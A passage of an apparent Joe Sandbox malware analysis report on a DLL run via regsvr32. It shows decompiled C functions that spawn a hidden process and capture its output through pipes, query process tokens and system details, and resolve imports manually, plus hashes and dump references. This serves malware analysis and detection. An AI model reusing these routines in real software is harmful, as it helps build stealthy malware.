						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}































































                  0x10004a0b
                  0x10004a18
                  0x10004a23
                  0x10004a28
                  0x10004a2a
                  0x10004a2d
                  0x10004a32
                  0x10004a35
                  0x10004a3f
                  0x10004a41
                  0x10004a46
                  0x10004a4e
                  0x10004a57
                  0x10004a57
                  0x10004a64
                  0x10004a7f
                  0x10004a86
                  0x10004a88
                  0x10004a8d
                  0x10004a92
                  0x10004a98
                  0x10004aa7
                  0x10004ac6
                  0x10004ac8
                  0x10004ace
                  0x10004ad4
                  0x10004ad9
                  0x10004add
                  0x10004ae0
                  0x10004aea
                  0x10004aec
                  0x10004aed
                  0x10004af8
                  0x10004afa
                  0x10004afd
                  0x10004b02
                  0x10004b09
                  0x10004b5e
                  0x10004b5e
                  0x10004b63
                  0x10004bca
                  0x10004bcf
                  0x10004bd1
                  0x10004bdb
                  0x10004be0
                  0x10004be0
                  0x10004bfa
                  0x10004bfc
                  0x10004bff
                  0x10004c01
                  0x00000000
                  0x00000000
                  0x10004c07
                  0x10004c11
                  0x10004c1a
                  0x10004c1f
                  0x10004c22
                  0x10004c28
                  0x10004c2e
                  0x10004c36
                  0x10004c38
                  0x10004c3b
                  0x10004c3c
                  0x10004c41
                  0x10004c44
                  0x10004c47
                  0x10004c49
                  0x10004c4d
                  0x10004c4d
                  0x10004c52
                  0x10004c55
                  0x10004c57
                  0x10004c5b
                  0x10004c5b
                  0x10004c62
                  0x10004c67
                  0x10004c69
                  0x10004c6d
                  0x10004c6f
                  0x10004c75
                  0x10004c79
                  0x10004c7c
                  0x10004c7d
                  0x10004c82
                  0x10004c85
                  0x10004c8a
                  0x10004cb2
                  0x10004cb8
                  0x10004cbf
                  0x10004cce
                  0x10004cd3
                  0x00000000
                  0x10004cd3
                  0x10004cc1
                  0x00000000
                  0x10004c8c
                  0x10004c8c
                  0x10004c91
                  0x10004c98
                  0x10004cdd
                  0x10004cdd
                  0x10004ce4
                  0x10004ce8
                  0x10004ce9
                  0x10004ce9
                  0x10004cf3
                  0x10004cf8
                  0x10004cfb
                  0x10004cfc
                  0x10004cfe
                  0x10004d00
                  0x10004d05
                  0x10004d0c
                  0x10004d4f
                  0x10004d0e
                  0x10004d13
                  0x10004d1b
                  0x10004d1f
                  0x10004d2a
                  0x10004d35
                  0x10004d3d
                  0x10004d41
                  0x10004d49
                  0x10004d49
                  0x10004d0c
                  0x10004d55
                  0x10004d58
                  0x10004d5a
                  0x10004d60
                  0x10004d60
                  0x10004d62
                  0x10004d62
                  0x00000000
                  0x10004d62
                  0x10004c9a
                  0x10004c9a
                  0x10004ca0
                  0x10004ca2
                  0x10004ca7
                  0x10004ca7
                  0x10004ca9
                  0x10004cd8
                  0x00000000
                  0x10004cd8
                  0x10004cab
                  0x10004ae4
                  0x10004ae4
                  0x00000000
                  0x10004ae4
                  0x10004c8a
                  0x10004b69
                  0x10004b77
                  0x10004b8a
                  0x10004b8f
                  0x10004b95
                  0x10004b97
                  0x10004baf
                  0x10004bb4
                  0x10004bbd
                  0x10004bc3
                  0x00000000
                  0x10004bc3
                  0x10004b9f
                  0x10004ba8
                  0x00000000
                  0x10004ba8
                  0x10004b0b
                  0x10004b0b
                  0x10004b11
                  0x10004b13
                  0x10004b51
                  0x10004b53
                  0x00000000
                  0x00000000
                  0x10004b55
                  0x10004b59
                  0x00000000
                  0x10004b59
                  0x10004b15
                  0x10004b1f
                  0x10004b2b
                  0x10004b36
                  0x10004b3d
                  0x10004b47
                  0x10004b4c
                  0x00000000
                  0x10004b4c
                  0x10004ae2
                  0x00000000
                  0x10004a66
                  0x10004a71
                  0x10004a77
                  0x10004a79
                  0x10004d64
                  0x10004d64
                  0x10004d66
                  0x10004d6c
                  0x10004d6c
                  0x00000000
                  0x10004a79

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: lstrcat$lstrcpy$memset
                  • String ID:
                  • API String ID: 1985475764-0
                  • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                  • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                  • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                  • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                  Download Yara Rule
                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                  • SysAllocString.OLEAUT32(?), ref: 1000D764
                  • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                  • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                  • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                  • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                  • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                  • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                  • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$\u%04X$\u%04X\u%04X
                  • API String ID: 0-2132903582
                  • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                  • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                  • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                  • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                  0x100121ff
                  0x10012207
                  0x1001220c
                  0x1001220f
                  0x10012214
                  0x1001221a
                  0x10012223
                  0x10012227
                  0x10012227
                  0x10012223
                  0x10012229
                  0x1001222e
                  0x10012237
                  0x1001223c
                  0x1001223f
                  0x10012248
                  0x1001224a
                  0x10012251
                  0x10012262
                  0x10012262
                  0x10012264
                  0x1001226c
                  0x10012273
                  0x00000000
                  0x1001226e
                  0x10012272
                  0x10012272
                  0x10012253
                  0x10012253
                  0x10012259
                  0x1001225b
                  0x10012260
                  0x10012276
                  0x10012279
                  0x1001227e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x10012260

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: _errno$localeconvstrchrstrtod
                  • String ID:
                  • API String ID: 1035490122-0
                  • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                  • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                  • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                  • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x2bb0590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x2bb1bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x2bb07b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x2bb07b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                  0x1000cf87
                  0x1000cf89
                  0x1000cf90
                  0x1000cf98
                  0x1000cfa2
                  0x1000cfa2
                  0x1000cfa8
                  0x1000cfb1
                  0x1000cfb7
                  0x1000cfb9
                  0x1000cfbd
                  0x1000cfbd
                  0x1000cfc2
                  0x1000cfc8
                  0x1000cfd8
                  0x1000cfe2
                  0x1000cfea
                  0x1000cfed
                  0x1000cff9
                  0x1000cfff
                  0x1000d004
                  0x1000d00a
                  0x1000d010
                  0x1000d016
                  0x1000d01e

                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,02BB0590,?,10003545), ref: 1000CF90
                  • GetModuleFileNameW.KERNEL32(00000000,02BB1BD4,00000105,?,?,02BB0590,?,10003545), ref: 1000CFB1
                  • memset.MSVCRT ref: 1000CFE2
                  • GetVersionExA.KERNEL32(02BB0590,02BB0590,?,10003545), ref: 1000CFED
                  • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CurrentProcess$FileModuleNameVersionmemset
                  • String ID:
                  • API String ID: 3581039275-0
                  • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                  • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                  • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                  • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000B946, Relevance: 7.5, APIs: 5, Instructions: 32threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E1000B946(void* __ecx) {
				void* _v8;
				void* _t9;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0 || GetLastError() == 0x3f0 && OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t9 = _v8;
				} else {
					_t9 = 0;
				}
				return _t9;
			}





                  0x1000b965
                  0x1000b992
                  0x1000b98e
                  0x1000b98e
                  0x1000b98e
                  0x1000b997

                  APIs
                  • GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
                  • OpenThreadToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B960
                  • GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
                  • GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
                  • OpenProcessToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B987
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CurrentOpenProcessThreadToken$ErrorLast
                  • String ID:
                  • API String ID: 102224034-0
                  • Opcode ID: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
                  • Instruction ID: 5b563ac24429287b405df7abe271a8f453b302f4379ab1304781a3c6047c2fee
                  • Opcode Fuzzy Hash: 84585c1d749f43a300b2851fef88a950c0520a77058640d0fe3f64d56e4382ed
                  • Instruction Fuzzy Hash: 20F05E7150061AABFB41DFA48C49F5E73ACFB04280F018418F702D3054E670EF048761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x2c2faa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x2c2faa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x2c2faa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x2c2faa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x2c2faa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x2c2faa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x2c2fc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x2c2faa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x2c2faa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}




































                  0x1000a9c2
                  0x1000a9c4
                  0x1000a9d0
                  0x1000a9d5
                  0x1000a9d8
                  0x1000a9da
                  0x1000a9dd
                  0x1000a9e0
                  0x1000a9e7
                  0x1000a9ea
                  0x1000a9f1
                  0x1000a9f4
                  0x1000a9fe
                  0x1000a9ff
                  0x1000aa02
                  0x1000aa04
                  0x1000aa05
                  0x1000aa1c
                  0x1000ab9c
                  0x00000000
                  0x1000ab9c
                  0x1000aa33
                  0x1000ab68
                  0x1000ab6e
                  0x1000ab79
                  0x1000ab7b
                  0x1000ab83
                  0x1000ab83
                  0x1000ab8a
                  0x1000ab8c
                  0x1000ab95
                  0x1000ab95
                  0x00000000
                  0x1000ab98
                  0x1000aa39
                  0x1000aa3c
                  0x1000aa3f
                  0x1000aa45
                  0x1000aa4f
                  0x1000aa59
                  0x1000aa60
                  0x1000aa69
                  0x1000aa6b
                  0x1000aa71
                  0x00000000
                  0x00000000
                  0x1000aa7c
                  0x1000aa83
                  0x1000aa84
                  0x1000aa89
                  0x1000aa8a
                  0x1000aa8b
                  0x1000aa90
                  0x1000aa92
                  0x1000aa93
                  0x1000aa94
                  0x1000aa97
                  0x1000aa9d
                  0x00000000
                  0x00000000
                  0x1000aaa3
                  0x1000aaab
                  0x1000aaae
                  0x1000aab6
                  0x1000aab9
                  0x1000aabc
                  0x1000aac2
                  0x1000aad6
                  0x1000aadc
                  0x1000aae2
                  0x1000ab0b
                  0x1000aae4
                  0x1000aae4
                  0x1000aae6
                  0x1000aae8
                  0x1000aaf0
                  0x1000aaf8
                  0x1000aafd
                  0x1000aafd
                  0x1000ab11
                  0x1000ab13
                  0x1000ab13
                  0x1000ab1b
                  0x1000ab23
                  0x1000ab24
                  0x1000ab29
                  0x1000ab32
                  0x1000ab52
                  0x1000ab52
                  0x1000ab5a
                  0x1000ab5d
                  0x1000ab65
                  0x00000000
                  0x1000ab65
                  0x1000ab3b
                  0x1000ab3f
                  0x00000000
                  0x00000000
                  0x1000ab47
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 1000A9F4
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                  • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                    • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CreateHeapPipe$AllocFreememset
                  • String ID: D
                  • API String ID: 488076629-2746444292
                  • Opcode ID: 6405c1b7d1c6c7a6e3f33fd221f7c85a2d91a5713c5d3a3e097b2ffc08a8e906
                  • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                  • Opcode Fuzzy Hash: 6405c1b7d1c6c7a6e3f33fd221f7c85a2d91a5713c5d3a3e097b2ffc08a8e906
                  • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}






















                  0x100124a1
                  0x100124a9
                  0x100124be
                  0x100124d0
                  0x100124dc
                  0x100124e2
                  0x100124e7
                  0x100124f3
                  0x1001265e
                  0x00000000
                  0x1001265e
                  0x100124f9
                  0x10012502
                  0x10012510
                  0x10012513
                  0x10012522
                  0x10012522
                  0x10012529
                  0x10012537
                  0x1001253a
                  0x1001254a
                  0x10012557
                  0x1001255e
                  0x1001256e
                  0x10012580
                  0x10012586
                  0x10012570
                  0x10012578
                  0x10012578
                  0x10012589
                  0x1001258d
                  0x10012599
                  0x1001259d
                  0x100125a1
                  0x100125a5
                  0x100125b1
                  0x100125dc
                  0x100125e4
                  0x100125ea
                  0x100125f6
                  0x10012602
                  0x100125b3
                  0x100125b8
                  0x100125c3
                  0x100125cf
                  0x100125cf
                  0x1001260b
                  0x10012611
                  0x1001261b
                  0x10012637
                  0x1001261d
                  0x10012620
                  0x1001262c
                  0x1001262c
                  0x1001261b
                  0x1001263f
                  0x10012648
                  0x10012648
                  0x10012656
                  0x00000000
                  0x10012656
                  0x10012562
                  0x00000000
                  0x10012562
                  0x00000000
                  0x1001253a
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                  • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID: GetProcAddress$kernel32.dll
                  • API String ID: 4133054770-1584408056
                  • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                  • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                  • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
